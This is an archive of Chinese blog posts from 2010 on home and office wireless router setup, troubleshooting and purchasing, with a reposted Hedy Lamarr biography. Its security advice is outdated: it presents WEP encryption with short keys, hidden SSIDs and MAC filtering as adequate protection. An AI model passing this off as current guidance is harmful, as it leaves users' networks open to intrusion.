由于天线增益的大小直接影响到信号的发射强度和接收能力,而市场上有些路由器的天线采用的是可拆卸设计,所以给无线路由器更换一个高增益的天线是增强信号最直接的方法。增益天线市场上有很多,价格也便宜。不过一点值得注意的是,在购买的时候应该询问清楚是否是全向天线,否则使用定向天线只能向一个方向传输无线信号。

另外我们也可以对无线网卡的天线进行扩展,不过无线网卡的天线一般不可拆卸,更换起来也比较麻烦。其实生活中的很多小物品,都可以起到增强无线网络信号的作用。网络上也有很多DIY无线网络增益天线的方法,如使用奶粉罐,蚊香盘,漏勺等,有兴趣的网友不妨一试。

增强无线网络信号的总结:

文中提到的这些技巧,能够在一定程度上改善信号强度,不过,路由器本身的实际发射功率才是最关键的。当然读者完全不必担心购买无线路由器后在家里不好用。现在家用的主流无线路由器其标准速率为54Mbps,而我们家中的宽带接入如果是ADSL一般为2M,而小区宽带其共享带宽一般为10M,即使是信号强度未能达到100%,其传输速率也能够满足一般家庭用户的上网需求了。
类别:Wireless N.T | Tags: , | 0 条评论, 725 次阅读
Nov
12
2010
无线故障排查要点汇总
  
  无线故障排查一、是否属于硬件问题
  当无线网络出现问题时,如果只是个别终端无法连接,那很有可能是众多接入点中的某个点出现了故障。一般来说,通过查看有网络问题的客户端的物理位置,就能大致判断出问题所在。
  而当所有终端无法连接时,问题可能来自多方面。比如网络中只有一个接入点,那这个接入点可能就有硬件问题或配置有错误。另外,也有可能是外界干扰过大,或是无线接入点与有线网络间的连接出现了问题等。
  无线故障排查二、接入点的可连接性如何
  要确定无法连接网络问题的原因,还可以检测一下各终端设备能否正常连接无线接入点。简单的检测方法就是ping无线接入点的IP地址,如果无线接入点没有响应,有可能是电脑与无线接入点间的无线连接出了问题,或者是无线接入点本身出现了故障。要确定到底是什么问题,可以尝试从无线客户端ping无线接入点的IP地址,如果成功,说明刚才那台电脑的网络连接部分可能出现了问题,比如网线损坏等。
  无线故障排查三、设备的配置是否错误
  无线网络设备本身的质量一般还是可以信任的,因此最大的问题根源一般来自设备的配置上,而不是硬件本身。比如可以通过网线直接ping到无线接入点,而不能通过无线方式ping到它,那么基本可以认定无线接入点的故障只是暂时的信号不够、频道偏离等。检查配置的方向可以是服务区标识符(SSID)、设备之间的WEP密钥匹配等方面。
  无线故障排查四、多个接入点是否不在客户列表内
  一般无线接入点都带有客户列表,只有列表中的终端客户才可以访问它,因此这也有可能是网络问题的根源。因为这个列表记录了所有可以访问接入点的无线终端的MAC地址,而通常情况下这个功能又是没被激活的,当将其激活后,如果此列表中没有保存任何MAC地址,就会出现无法连接的情况。
  综上所述,无线网络最常见的故障就是无线建立连接,而造成这类原因,多又都来自软件配置上。因此在无线网络的故障排查过程中,应本着“先软后硬”的原则,耐心仔细的进行。
类别:Wireless N.T | Tags: , | 0 条评论, 486 次阅读
Nov
2
2010
  典型的无线路由器配置文件可以分为以下几个部分:管理员部分(路由器名称、口令、服务、日志);端口部分(地址、封装、带宽、度量值开销、认证);路由协议部分(IGRP/EIGRP、OSPF、RIP、BGP);流量管理部分(访问控制列表、团体);路由原则部分(路由映射);带宽之外的接入部分(主控台、远程登录、拨号)等,也就是说,企业宽带无线路由器配置问题大多数来自于以上文件的配置中。
  无法进行拨号
  故障现象:不能进行正常的拨号程序。
  故障原因:主要问题是出在无线路由器的地址设置方面。
  解决方法:这种问题的解决方法比较简单,具体做法是:打开Web浏览器,在地址栏中输入路由器的管理地址,如192.168.1.1,此时系统会要求输入登录密码(该密码可以在产品的说明书上查询到),登陆后进入管理界面,选择菜单“网络参数”下的“WAN口设置选项,在右边主窗口中,“WAN口连接类型”选择“PPPoE”,输入“上网账号”及“上网口令”,点击连接按钮即可。
  部分计算机无法正常连接
  故障现象:路由器硬件上没有问题,所连接的计算机也没有问题,但是却不能实现正常连接,而局域网中的其他计算机可以正常连接上网。
  故障原因:这一般是由于ISP绑定MAC地址造成无法连接,因为有些ISP为了限制接入用户的数量,而在认证服务器上对MAC地址进行了绑定,不在绑定范围内的用户就不能正常连接上网。
  解决方法:处理这种无线路由器配置问题,先将被绑定MAC地址的计算机连接至路由器LAN端口(但无线路由器不要连接Modem或ISP提供的接线),然后,采用无线路由器的MAC地址克隆功能,将该网卡的MAC地址复制到宽带路由器的WAN端口,接着在未被绑定的计算机上进行如下操作:Windows 2000/XP下按“开始→运行”,输入“cmd/k ipconfig /all”,其中“Physical Address”就是本机MAC地址。
  故障现象:网页以不能正常打开,但是QQ之类的程序却可以正常运行。
  故障原因:这种情况是无线路由器配置上的DNS解析问题,如果将网关设置成DNS地址,这是DNS Proxy,并非真实的DNS地址,就可能会导致地址解析出错。
  解决方法:要解决这个问题,建议在路由器和计算机网卡上手动设置DNS服务器地址((ISP局端提供的地址),打开无线路由器设置界面,找到“网络参数”中的“WAN口参数”的字段,然后在下面手动设置DNS服务器地址。另外,在“DHCP服务”设置项,也需要手动设置DNS服务器和备用的DNS服务器地址,该地址需要从ISP供应商那里获取。
  无法登录路由器管理页面
  故障现象:想对企业宽带无线路由器作共享上网的有关设置,但却进不了管理界面。
  故障原因:主要是之前登陆时所创建的连接有误。
  解决方法:如果以前登录过路由器管理界面,那么用户应该首先检查宽带路由器与电脑的硬件连接情况,检查路由器LAN口上的指示灯是否正常,如果计算机中装有防火墙或实时监控的杀毒软件,都暂时先关闭,然后将本机IP地址设为与宽带无线路由器同一网段,再将网关地址设为路由器的默认IP地址。解决这种无线路由器配置情况,可先了解一下宽带路由器的Web管理方式。通常宽带路由器提供的都是Web管理方式,因此打开“Internet选项”对话框,在“连接”选项中,如果曾经创建过连接则勾选“从不进行拨号连接”选项,点击“局域网设置”按钮,将已勾选的选项全部取消选中即可。
类别:Wireless N.T | Tags: , | 0 条评论, 699 次阅读
Nov
2
2010
选购无线AP都需要了解哪些内容呢?那么这里我们就来为大家总结一下这方面的几个要点吧。目前市场上的无线网络产品种类非常多,不仅有国产品牌,还有国外大厂的产品;而且价格差距也非常大,有100多元,也有上千元;在速度方面,有11Mbps的无线网络产品,也有54Mbps、甚至高达108Mbps的产品。那么该如何选择适合自己的产品呢?我们常说的无线AP(Wireless Access Point,即无线接入点)其实包括具有路由功能的无线路由器和不具有路由功能的纯无线AP,无线AP的主要功能就是将无线局域网中的计算机连接在一起,然后接入有线局域网,起到“桥梁”的作用。

选购无线AP 之一 认证、标准

无线路由器一般支持802.11b和802.11g标准,理论上分别可以实现最大11Mbps、54Mbps的传输速率,产品一定要通过Wi-Fi认证。对于普通家庭用户而言,选择802.11b标准的产品即可,而采用802.11g标准的产品价格要高很多。当然,如果有必要,802.11g标准的产品也可以考虑,毕竟速度方面提升了一个层次。另外,还必须要支持IEEE 802.3以及IEEE 802.3u网络标准。

选购无线AP 之二 端口数量与速率

无线路由器一般都内置交换机,在端口方面应该至少包括1个WAN端口以及4个LAN端口。WAN端口用于和广域网连接(比如Cable Modem/ADSL/以太网等),LAN端口用于和局域网内的计算机连接。在端口的传输速率方面,选择10/100Mbps自适应RJ-45端口(支持MDI/MDIX)即可。

选购无线AP 之三 网络接入方式

为了能实现无线上网,无线路由器支持的网络接入方式就非常重要,比如使用ADSL上网的用户选择的产品必须支持ADSL接入,对于小区宽带用户,必须要支持以太网接入方式。

选购无线AP 之四 是否内置防火墙

通过防火墙功能可以保证网络的安全,无线路由器的防火墙功能一般包括LAN防火墙和WAN防火墙,前者可采用IP访问限制、MAC地址过滤等手段来限制局域网内的计算机访问Internet;后者可以采用网址过滤、动态包过滤等手段来阻止Internet上黑客的攻击。

选购无线AP 之五 必要的高级功能

对于无线路由器,最好还具有DHCP服务器、NAT、DDNS(动态DNS)、虚拟服务器等高级功能,比如通过DDNS可以将动态IP地址解析为一个固定的域名出于安全的考虑,无线路由器至少应该支持68/128位WEP加密。另外,需要注意无线路由器的管理功能,至少应该支持Web浏览器的管理方式。
类别:Wireless N.T | Tags: , | 0 条评论, 544 次阅读
Nov
2
2010
首先是因特网部分的设置

如果是用LAN方式访问互联网的,第一项可以直接选默认的“否”,其他按照网络供应商的要求无线路由安全配置。ADSL modem自动拨号的用户同上;但ADSL拨号上网的用户,一定要选“是”,下面的设置才有效。用户名和密码用电信给你的那个,当然密码可以到电信的网上改一个自己常用的安全密码(复杂但好记的)。之后的两项选“ISP处动态获取”就可以了。最后,点应用,就OK了。

这样无线路由安全配置后,自己设的拨号连接都没有用了。只要将打开ADSL和路由开关,无线路由就会自动向ADSL MODEM拨号,并连接上互联网。电脑嘛,只要待开机后连上无线路由,就可以直接上网了(不用再点拨号连接)。

更改无线网络标识(SSID)

下面就是更改SSID,对于刚买来的无线路由器来说,SSID都是出厂的默认设置,每个路由都一样。如果在你搜索无线网络的范围内也有同样牌子的无线路由在工作,SSID就会重复,可能会影响到你访问。所以能够修改一下,还是十分必要的。

修改网件的SSID,是在菜单的“无线路由安全配置”中进行的。可以改成你自己喜欢的代码(注意:SSID是要严格区分大小写的)。比如我用的就是veryzhh。改好SSID后,点应用就行了。地区:本框显示的是本无线接口的设计工作地区(此处用默认的)。频道:本框确定了将要使用的工作频率。除非发现与附近的接入点之间存在干扰问题,否则无需经常更改无线频道。

◆模式:选项包括以下几种

◆QUOTE:

◆g & b——可同时使用802.11g和802.11b无线工作站。

◆仅g——只能使用802.11g无线工作站。

◆仅b——可使用全部802.11b无线工作站。802.11g无线工作站中,凡可以在802.11b模式中工作的,也可以使用。

◆缺省为“g & b”,这样“g”和“b”两类无线工作站均可访问本设备。

对无线路由进行加密设置

目前,无线路由多用WEP和WPA两种加密方式,有的无线路由只有WEP一种加密方式。WGR614是两种都有。默认的安全选项为“无”,无线路由处于未加密状态,在搜索时显示为“未设置安全机制的无线网络”。而使用了WEP加密的,会显示为“启用安全的无线网络”;使用WPA加密的,会显示为“启用安全的无线网、络(WPA)”。我们的NDSL只支持WEP加密,所以我们选择WEP加密,强度选择128位(V7比V5多2个选项,在这里的设置都是一样的):

网件内置了一个密钥生成器,你可以用一个你自己容易记的一串代码,来生成密钥,生成前选择好是64位还是128位。这里还可以使用中文代码,比如用“我是超版”就可以生成一串复杂得变态的16进制密钥(当然我实际用的不是这句话啦,呵呵)。

生成密钥后,可以放在无线路由安全配置,分别对应密钥1、密钥2、密钥3、密钥4。也就是说,你可以在路由里预先存入不同的四组密钥,使用时只要选定其中的一组就可以了。这个密钥,请先复制粘贴到一个新开的记事本中,等会要用。此处选定第1组密钥。

禁止SSID

在无线路由的基础安全设置中,禁止SSID广播是十分常用的一项。对于无线网络内,电脑数量少(甚至只有一台)的朋友而言,这个设置并不影响使用的方便性,又能切实保障其他人不能通过常规手段来搜索并登录你的无线网络。

然而,无线路由在买来时,出去使用上的方便性(对于初学者尤其必要),SSID广播都是打开的。无线路由通过广播将自己的SSID号发送到空间中,而在有信号的区域中,任何一款无线网卡都可以通过扫描的方式来找到这个SSID号。

如果我们结合前面修改SSID的方法,同时关闭SSID,则普通人就较难猜到你的SSID,也无法用常规方式(XP自带方式)搜到你的无线路由,找不到你,自然就安全一些了。方法如下:

◆点击WGR614设置菜单中的“高级”项下面的“无线设置”,可以看到启用SSID广播一项是选中的。

◆只要取消“启用SSID广播”前面的勾,点应用,就能关闭SSID广播了。

其他一些必要的无线路由安全配置措施,修改无线路由的登录密码:防止他人通过你的电脑修改无线路由设置(在进行了以上设置后,他人通过其他未进行相关配置的电脑是无法连接你的无线路由的),所以改掉无线路由的默认密码,是防止他人乘你不注意,修改无线路由设置的必要手段;方法很简单,在WGR614的维护一栏中,有设置密码一项,后面的事,不用我教了吧:)

◆NDS/NDSL端设置

◆打开NDS,进马车,打开WIFI设置

◆点击左侧的Nintendo Wi-Fi Connection Settings

一共可以存储3条不同的WIFI连接设置,可以任选一个进入,由于前面关闭了SSID广播,所以在这一步我们选择Manual Setup进行手动设置。

◆SSID:填入WGR614中设置的SSID

◆WEP Key:输入刚才记事本中保存的第一组密钥

◆两个Auto-obtain都选YES

点Test Connection进行测试,测试通过后保存(Save Setting)即可返回NINTENDO WFC窗口,点选第一个就可以进行WIFI联机了。(WIFI设置只需一次,成功后每个游戏就不用反复设置了)以后不用开电脑就可以NDSL WIFI了。教程终于写完了,希望能给我们广大的玩家提供帮助,其他品牌的无线路由配置大致相同,大家可以借鉴一下,如有疑问的也可在此相互交流,大家共同学习无线路由安全配置。
类别:Wireless N.T | Tags: , , , | 0 条评论, 713 次阅读
Nov
2
2010
对于设置无线路由来说,可能有些朋友并没有完全掌握。那么这里我们就来介绍一下快速设置无线路由的方法吧。希望通过下面的一些总结,能够让大家了解到这些方法。今天装了无线路由.TP-LINK的。曾经装过无数台有线路由,今天装无线的,又学了几招,记录下来。

快速设置无线路由1、连上路由,先登入路由修改登陆名和密码。

打开浏览器,在地址栏输入 192.168.1.1弹出登陆窗口默认用户名和密码是:admin成功登陆后在左侧菜单树点 -系统工具 -修改登陆口令 修改即可。

快速设置无线路由2、克隆MAC地址

点击 菜单树 -网络参数 -MAC地址克隆克隆后在 菜单树 -系统工具 -重启路由器重启后即可。

快速设置无线路由3、如果是网通宽带,需要把AD的帐号密码设置到路由里面,以后上网就不需要再输入用户名密码了。

菜单树 -网络参数 -WAN口设置 WAN口连接类型选择PPPoE输入帐号密码 保存 即可。如果是歌华,没有帐号密码,默认选中动态IP即可。

快速设置无线路由4、无线网络的设置

菜单树 -无线参数 -基本设置在SSID号 中输入一个你无线网络的名字,随便起 这样在你无线映射范围内可以刷到这个无线网络。

例如:mlkysn点亮 开启无线功能点灭 允许SSID广播(这是为了安全性考虑,点灭这项后在无线网络里就刷不到你这个名为:mlkysn这个无线网络了,包括你自己,下面再讲你怎么连接)点亮 开启安全设置安全类型 选择 WEP即可 // 安全选项 自动选择 // 密钥格式选择 ASCII码选择密钥1输入一个密码ASCII码是五位的 推荐数字字母组合 列如:usa78密码类型64位

快速设置无线路由5、上面设置完毕,就可以在电脑上点击桌面右下的无线网络图标

弹出 无线网络连接 设置窗口选择为家庭或小型办公设置无线网络下一步 设置新无线网络,下一步 在网络名字中设置上面设置的名字 mlkysn点手动分配网络密钥 输入上面设置的密码 usa78下一步 完成就可以连接上无线网络了如果别的电脑连接,步骤一样。

快速设置无线路由6、安全性

菜单树 -安全设置 -防火墙设置 点选 开启防火墙即可

菜单树 -安全设置 -高级安全设置启用 DOS攻击防范 点选 开启ICMP-FLOOD攻击过滤、开启UDP-FLOOD过滤、开启TCP-SYN-FLOOD攻击过滤、忽略来自WAN口的Ping。保存OK。再推荐一种安全性设置MAC地址过滤

例:笔记本A 要连接先查看笔记本A的MAC地址 在笔记本A上点 开始-运行-cmd 控制台输入 ipconfig /all查看本机的MAC地址 例如:00-5B-88-27-UE-8D 记住菜单树 -无线参数 -MAC地址过滤 开启这个功能MAC地址过滤功能注意这如下顺序 先 添加新条目MAC地址 填写 上面查到的 00-5B-88-27-UE-8D类型 选 64位输入密码 列 ysnysn再选择 类型 允许选 生效保存 OK。

在过滤过则下 点选这项 禁止列表中生效规则之外的MAC地址访问本无线网络别的电脑如要联网 也要如此设置,记住哪台电脑要连无线网,先用那台电脑查本机的MAC地址,再用已连接到网络的电脑在 路由设置的 MAC地址过滤中加入 MAC地址。
类别:Wireless N.T | Tags: , , | 0 条评论, 655 次阅读
Nov
2
2010
文章来源:http://bigpack.blogbus.com/logs/79204113.html
她既是性感的艳星,也是伟大的科学家。
  “比我聪明的都没我漂亮,比我漂亮的都没我聪明。”这句话虽并非出自海蒂·拉玛之口,却真真切切地成了她的写照。在那个黑白片时代,她被誉为“世界上最美丽的女人”,费雯·丽也因长得像她而倍感自豪。不仅如此,她还发明了“扩频通讯技术”,被誉为“世界上最美丽的科学家”。
点击在新窗口中浏览此图片
  美丽的过失
  海蒂·拉玛本名海德维希·爱娃·玛丽娅·基斯勒,1914年11月9日出生于奥地利维也纳。她的父亲是当地知名的犹太银行家,母亲是一名钢琴家。出身于这样一个显赫的家庭,海蒂从小生活富裕,衣食无忧,并受到良好的教育,但与大多数名门闺秀不同,她的骨子里有一丝叛逆。
  当她迷上表演时,才十几岁的年龄,就不顾父母的反对,跟随著名戏剧导演马克思·莱因哈特去了德国。凭着自己无与伦比的外形条件,1931年,在她16岁时,迎来了自己的第一部电影《街上的钱》。
  第二年,有一家捷克斯洛伐克电影公司,邀请她去担当《神魂颠倒》的女主角,并承诺将这部电影推向国际市场,唯一的条件是她必须全裸出镜。她答应了。由此,她成为世界上首位全裸出镜的明星。在这部影片中,她精致的面容和奔跑在树林中的曼妙胴体,在震惊观众之余也带来了铺天盖地的非议。这部影片被很多国家禁播,海蒂却一夜成名。
  1937年,海蒂在米高梅三巨头之一的路易·梅耶的引荐下,成功打入好莱坞。“海蒂·拉玛”这个艺名就是这个时候米高梅电影公司为她取的。一入电影圈,海蒂的美貌就引起人们的骚动。也许,正是因为海蒂过于美丽,人们在欣赏她的影片时,除了陶醉于她的美貌,也无心去注意她的演技了。
  1942年,海蒂错过了《卡萨布兰卡》、《煤气灯下》的角色,她的花瓶形象再无翻身的机会。她在好莱坞令人惊艳了近40年,和包括克拉克·盖博在内的数名影帝合作过,却从未获得过任何奖项。即使到了彩色片时代,奥黛丽·赫本、玛丽莲·梦露等新偶像席卷天下的时候,年近50岁的她仍然在《霸王妖姬》中,以美貌颠倒众生,令许多正值妙龄的女演员都自叹不如。
  惊世容颜却无一部传世作品,不免令人叹息。
点击在新窗口中浏览此图片
  6次失败的婚姻
  海蒂的第一任丈夫是奥地利的军火大亨曼德尔。曼德尔在看过海蒂的《神魂颠倒》之后,便对她着迷不已。一年之后,在一次舞会上,他与海蒂一见钟情。3个月后,他们闪电结婚。
  为了让妻子不再被别人观赏,曼德尔不惜一掷千金,拼命收集《神魂颠倒》的拷贝。而且禁止妻子再涉足电影业,也不让妻子随便外出,这让海蒂非常痛苦。
  虽然曼德尔和海蒂一样,都是奥地利犹太人,但他支持纳粹,和希特勒、墨索里尼相交甚好。而海蒂坚决反对纳粹,于是他们有了不可调和的矛盾。
  为了赚取更多的钱财,曼德尔时常利用妻子的美貌,去讨好纳粹的高层。到了最后,曼德尔愿意与任何战争的任何一方的任何人做生意,正因为如此,他的工厂在1938年被纳粹没收。
  1937年的一天,海蒂陪同丈夫出席晚宴,中途她以身体不适为由退席。然后用迷药迷昏了随从侍女,跳出盥洗室的窗户,乘当天的火车连夜逃到了法国巴黎,结束了她与曼德尔的婚姻。
  之后,海蒂先后与作家吉恩·马基、英国演员约翰·洛德、乐队指挥欧内斯特·斯托弗、石油商人霍华德·李、律师刘易斯·鲍尔斯结婚。她的一儿一女,都是与约翰·洛德所生。
  中年以后的海蒂对其几次失败的婚姻不无感慨:“我决不能再嫁给一个在我面前老是自惭形秽的男人了。我相信总会有那么一个男人可以做我的丈夫,同时不会自觉微贱。我需要一个最优秀的微贱男人。”但她似乎最终也没能找到适合自己的那个最优秀的微贱男人。
点击在新窗口中浏览此图片
  最美丽的女发明家
  在海蒂的演艺生涯中,她总是被自己的美貌困扰,她抱怨说,电影公司往往在宣传中突出她是“世界上最美丽的女人”,观众根本不注意她的演技。每到一处,男人们都对她的美貌肃然起敬,却对她本身内在的东西并不感兴趣。为了证明自己不但有美貌,也有智慧,海蒂很快投身于科学研究。而她在从事表演之前,本身所学的就是通讯专业。
  在她与曼德尔的婚姻中,她经常参加丈夫的商业会议,令人难以置信地学会了用无线电信号控制武器。但是无线电信号有时会阻塞,海蒂富有远见地认识到,不断地和随意地改变无线电波频率,可以防止信号阻塞的发生,从而防止敌方干扰。
  当她与曼德尔的婚姻破裂后,她便将这些技术运用到了自己随后的发明中。1940年初,她和作曲家乔治设计出了一个飞机导航系统。乔治构思了一对纸卷,分别安置在飞机和鱼雷里面,来指定变化频率的次序。海蒂和乔治为他们的“频率跳变”装置设计申请了专利,并捐献给了政府。在1942年的8月,他们得到美国的专利,这就是“扩频通讯技术”。可惜当时的美国军方完全不把他们的研究当一回事,拒绝尝试,并为之保密。海蒂在当时未能获得任何荣誉。
点击在新窗口中浏览此图片
  在上世纪50年代后期,海蒂的这一杰出设计思想,被广泛运用到军队计算机芯片中。从那时起,这一技术也启发了许许多多通信领域的科学家,从而被广泛运用到手机、无线电话和互联网协议的研发上,以使很多人共同使用同一频段的无线电信号。
  1997年,当以CDMA为基础的通信技术开始走入大众生活时,科学界才想起了已经83岁高龄的海蒂,授予了她“电子国境基金”的先锋奖,这一奖项对她在计算机通信方面的贡献给予了承认。但此时,她的专利已经失效,所以她终生未能因此而得利。
  但直到今天,她对全球无线通讯技术所做的贡献仍旧无人能及,是当之无愧的“扩频之母”,甚至于称得上“手机之母”。
点击在新窗口中浏览此图片
  孤独一生
  在海蒂的晚年生活中,由于在自己钟爱的演艺事业上未获得成功,自己的发明也一直未被认可,婚姻又几经失败,郁郁不得志的她,虽然不缺乏财富,却开始养成了一些奇怪的习惯,比如偷窃商店。在1966年,她就被指认在商店顺手牵羊而被拘留,后无罪释放。1991年,年近八旬的她再次因同类问题被拘留,被判监外察看一年。
  晚年的她是孤独的。她独自一人居住在美国佛罗里达州的一所公寓中,朋友们定期去看望她。她不仅出演了首部*电影,还出版了首本自曝隐私的自传,因此饱受人们的争议,而很少有人真正去理解她的内心世界,哪怕是她的亲人。
  2000年1月19日,海蒂被发现死在家中的床上,享年86岁。警方认为她是在睡梦中死去的,对着她床头的电视还开着。她的律师说:“对于我来说,她一直是最完美的电影明星,她走路时总是昂着头,她非常漂亮,即使年老时也是那么美。”
  这位到老仍美丽非凡的女科学家,在百年之后仍然留下了种种传说,令人唏嘘不已。
类别:Wireless N.T | | 0 条评论, 301 次阅读
Oct
17
2010
无线IP冲突,是我们使用无线网络时常会遇到的故障情况。那么这个是什么原因造成的呢?又应该如何解决呢?下面我们就来看看详细的内容吧。在一些无线网络中,由于客户机数目较多,为方便对这些机器进行管理,很多管理员会使用无线路由器提供的DHCP服务,为客户机提供TCP/IP参数配置,如IP地址、网关地址和DNS服务器等。但如果你的无线网络中,有些电脑必须手工指定TCP/IP参数配置,这时DHCP服务器提供的动态IP地址和手工指定的静态IP地址共存,如果你没有合理配置无线路由器中DHCP服务器的参数,就会很容易造成IP地址冲突。

无线IP冲突 如何产生?

如笔者管理的一个无线网络,有50台电脑,其中有5台电脑由于特殊需要,使用了手工设置静态IP地址的方式,使用的IP地址段为“192.168.1.10~192.168.1.14”,其它45台电脑通过无线路由器的DHCP服务获得IP地址等参数信息。但如果你的无线路由器中DHCP服务的“地址池”参数设置不合理,包含了以上5台电脑使用的IP地址段,就有可能产生IP地址冲突。

产生IP地址冲突的原因非常简单,如使用静态IP地址“192.168.1.11”的电脑A没有开机,当无线网络中的某台电脑B向无线路由器的DHCP服务器申请IP地址时,DHCP服务器发现“192.168.1.11”这个IP地址目前是空闲的,没有任何电脑使用,就很有可能将这个IP地址分配给申请IP地址的电脑B。当电脑A开机启动后上线,就会发现还有其它电脑使用“192.168.1.11”这个IP地址,于是就会产生IP地址冲突。

解决无线IP冲突 需合理设置DHCP参数

知道了无线网络IP址冲突是如何产生的,预防这种事情的发生就很简单了,只要你合理设置DHCP服务器中的“地址池”参数。你要清楚地知道,采用静态IP地址方式的电脑占用了哪些IP地址段,为了避免发生IP地址冲突,在配置DHCP服务器的“地址池”参数时,一定要排除被静态IP地址占用的这些地址段。
点击在新窗口中浏览此图片
为了更直观的解决无线IP冲突问题,这里还是以笔者的无线网络为例(如图),采用静态IP地址的电脑占用了“192.168.1.10~192.168.1.14”这个IP地址段,因此在设置“地址池”参数时必须排除这个IP地址段,以防止冲突的产生,如笔者将“地址池”参数设置为“192.168.1.15~192.168.1.60”,这样既满足了45台动态IP地址客户机的需要,又防止了IP地址冲突的产生。
类别:Wireless N.T | Tags: | 0 条评论, 559 次阅读
Oct
16
2010
选购无线AP都需要了解哪些内容呢?那么这里我们就来为大家总结一下这方面的几个要点吧。目前市场上的无线网络产品种类非常多,不仅有国产品牌,还有国外大厂的产品;而且价格差距也非常大,有100多元,也有上千元;在速度方面,有11Mbps的无线网络产品,也有54Mbps、甚至高达108Mbps的产品。那么该如何选择适合自己的产品呢?我们常说的无线AP(Wireless Access Point,即无线接入点)其实包括具有路由功能的无线路由器和不具有路由功能的纯无线AP,无线AP的主要功能就是将无线局域网中的计算机连接在一起,然后接入有线局域网,起到“桥梁”的作用。

选购无线AP 之一 认证、标准

无线路由器一般支持802.11b和802.11g标准,理论上分别可以实现最大11Mbps、54Mbps的传输速率,产品一定要通过Wi-Fi认证。对于普通家庭用户而言,选择802.11b标准的产品即可,而采用802.11g标准的产品价格要高很多。当然,如果有必要,802.11g标准的产品也可以考虑,毕竟速度方面提升了一个层次。另外,还必须要支持IEEE 802.3以及IEEE 802.3u网络标准。

选购无线AP 之二 端口数量与速率

无线路由器一般都内置交换机,在端口方面应该至少包括1个WAN端口以及4个LAN端口。WAN端口用于和广域网连接(比如Cable Modem/ADSL/以太网等),LAN端口用于和局域网内的计算机连接。在端口的传输速率方面,选择10/100Mbps自适应RJ-45端口(支持MDI/MDIX)即可。

选购无线AP 之三 网络接入方式

为了能实现无线上网,无线路由器支持的网络接入方式就非常重要,比如使用ADSL上网的用户选择的产品必须支持ADSL接入,对于小区宽带用户,必须要支持以太网接入方式。

选购无线AP 之四 是否内置防火墙

通过防火墙功能可以保证网络的安全,无线路由器的防火墙功能一般包括LAN防火墙和WAN防火墙,前者可采用IP访问限制、MAC地址过滤等手段来限制局域网内的计算机访问Internet;后者可以采用网址过滤、动态包过滤等手段来阻止Internet上黑客的攻击。

选购无线AP 之五 必要的高级功能

对于无线路由器,最好还具有DHCP服务器、NAT、DDNS(动态DNS)、虚拟服务器等高级功能,比如通过DDNS可以将动态IP地址解析为一个固定的域名出于安全的考虑,无线路由器至少应该支持68/128位WEP加密。另外,需要注意无线路由器的管理功能,至少应该支持Web浏览器的管理方式。
类别:Wireless N.T | Tags: , | 0 条评论, 551 次阅读
Oct
16
2010
对于设置无线路由来说,可能有些朋友并没有完全掌握。那么这里我们就来介绍一下快速设置无线路由的方法吧。希望通过下面的一些总结,能够让大家了解到这些方法。今天装了无线路由.TP-LINK的。曾经装过无数台有线路由,今天装无线的,又学了几招,记录下来。

快速设置无线路由1、连上路由,先登入路由修改登陆名和密码。

打开浏览器,在地址栏输入 192.168.1.1弹出登陆窗口默认用户名和密码是:admin成功登陆后在左侧菜单树点 -系统工具 -修改登陆口令 修改即可。

快速设置无线路由2、克隆MAC地址

点击 菜单树 -网络参数 -MAC地址克隆克隆后在 菜单树 -系统工具 -重启路由器重启后即可。

快速设置无线路由3、如果是网通宽带,需要把AD的帐号密码设置到路由里面,以后上网就不需要再输入用户名密码了。

菜单树 -网络参数 -WAN口设置 WAN口连接类型选择PPPoE输入帐号密码 保存 即可。如果是歌华,没有帐号密码,默认选中动态IP即可。

快速设置无线路由4、无线网络的设置

菜单树 -无线参数 -基本设置在SSID号 中输入一个你无线网络的名字,随便起 这样在你无线映射范围内可以刷到这个无线网络。

例如:mlkysn点亮 开启无线功能点灭 允许SSID广播(这是为了安全性考虑,点灭这项后在无线网络里就刷不到你这个名为:mlkysn这个无线网络了,包括你自己,下面再讲你怎么连接)点亮 开启安全设置安全类型 选择 WEP即可 // 安全选项 自动选择 // 密钥格式选择 ASCII码选择密钥1输入一个密码ASCII码是五位的 推荐数字字母组合 列如:usa78密码类型64位

快速设置无线路由5、上面设置完毕,就可以在电脑上点击桌面右下的无线网络图标

弹出 无线网络连接 设置窗口选择为家庭或小型办公设置无线网络下一步 设置新无线网络,下一步 在网络名字中设置上面设置的名字 mlkysn点手动分配网络密钥 输入上面设置的密码 usa78下一步 完成就可以连接上无线网络了如果别的电脑连接,步骤一样。

快速设置无线路由6、安全性

菜单树 -安全设置 -防火墙设置 点选 开启防火墙即可

菜单树 -安全设置 -高级安全设置启用 DOS攻击防范 点选 开启ICMP-FLOOD攻击过滤、开启UDP-FLOOD过滤、开启TCP-SYN-FLOOD攻击过滤、忽略来自WAN口的Ping。保存OK。再推荐一种安全性设置MAC地址过滤

例:笔记本A 要连接先查看笔记本A的MAC地址 在笔记本A上点 开始-运行-cmd 控制台输入 ipconfig /all查看本机的MAC地址 例如:00-5B-88-27-UE-8D 记住菜单树 -无线参数 -MAC地址过滤 开启这个功能MAC地址过滤功能注意这如下顺序 先 添加新条目MAC地址 填写 上面查到的 00-5B-88-27-UE-8D类型 选 64位输入密码 列 ysnysn再选择 类型 允许选 生效保存 OK。

在过滤过则下 点选这项 禁止列表中生效规则之外的MAC地址访问本无线网络别的电脑如要联网 也要如此设置,记住哪台电脑要连无线网,先用那台电脑查本机的MAC地址,再用已连接到网络的电脑在 路由设置的 MAC地址过滤中加入 MAC地址。
类别:Wireless N.T | Tags: , | 0 条评论, 639 次阅读
Oct
16
2010
无线路由器ARP攻击的处理
无线路由器ARP攻击故障排除技巧

随着现在社会信息技术的飞速发展,如今企业网络办公化也正式步入了无线网的领域中。构建无线网最大的好处就是组网无需布线,使用便捷、经济。所以对多数企业来说,无疑是组网方案的最佳选择。大量的无线路由器被用于企业中,使得针对无线网络的故障诊断和安全保障变得与有线网络一样重要。

在企业无线网办公中经常会出现一些使用手册上未涉及到的疑难和故障,有时难以应付,无法解决。下面就无线网络中由路由器引发的典型故障进行分析,并提供解决方案。

连接错误线路不通

网络线路不通有很多原因造成,但首先要检查的是连接配置上有无错误。

在确保路由器电源正常的前提下首先查看宽带接入端。路由器上的指示灯可以说明宽带线路接入端是否正常,由说明书上可以辨认哪一个亮灯为宽带接入端及用户端,观察其灯闪亮状态,连续闪烁为正常,不亮或长亮不闪烁为故障。我们可以换一根宽带胶线代替原来的线路进行连接。

如果故障依旧,请查看路由器的摆放位置与接收电脑的距离是否过远或中间有大型障碍物阻隔。这时请重新放置路由器,使无线路由器与接收电脑不要间隔太多障碍物,并使接收电脑在无线路由器的信号发射范围之内即可。

